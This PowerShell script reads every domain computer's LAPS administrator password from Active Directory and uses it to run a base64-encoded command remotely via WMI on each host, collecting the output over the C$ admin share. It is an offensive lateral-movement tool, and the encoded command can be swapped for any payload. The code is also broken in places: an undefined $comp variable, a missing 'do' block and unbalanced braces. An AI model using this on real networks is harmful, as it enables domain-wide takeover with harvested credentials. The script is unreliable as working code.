# Save with Encoding "UTF-8 with BOM"
[System.Console]::OutputEncoding = [System.Text.Encoding]::UTF8
$ErrorActionPreference = "Stop"
$command = '[System.Console]::OutputEncoding = [System.Text.Encoding]::UTF8; '
$command += 'whoami > C:\Windows\Temp\whoami.txt 2>&1'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | ? {$_.name -ne $(hostname)} | select name,ms-Mcs-AdmPwd | ForEach-Object {
$pass = $_."ms-Mcs-AdmPwd"
if (Test-Connection -BufferSize 32 -Count 1 -ComputerName $comp -Quiet) {
$cred = New-Object System.Management.Automation.PSCredential("$comp\administrator", $(ConvertTo-SecureString $pass -AsPlainText -Force))
$proc = Invoke-WmiMethod Win32_Process -Name Create -ArgumentList ("powershell -enc $encodedCommand") -ComputerName $comp -Credential $cred
Write-Host -ForegroundColor Green "[*] Waiting for script to finish on $comp"
} until ((Get-WmiObject -Class Win32_Process -Filter "ProcessId=$proc.ProcessId" -ComputerName $comp -Credential $cred | where {$_.ProcessId -eq $proc.ProcessId}).ProcessId -eq $null)
net use "\\$comp" /user:administrator $pass 2>&1 | Out-Null
Get-Content "\\$comp\C$\Windows\Temp\whoami.txt"
Remove-Item "\\$comp\C$\Windows\Temp\whoami.txt" -Force
net use "\\$comp" /delete 2>&1 | Out-Null
Write-Host -ForegroundColor Red "[-] Connection failure: $comp"
Write-Host -ForegroundColor Yellow "[!] Connection timed out: $comp"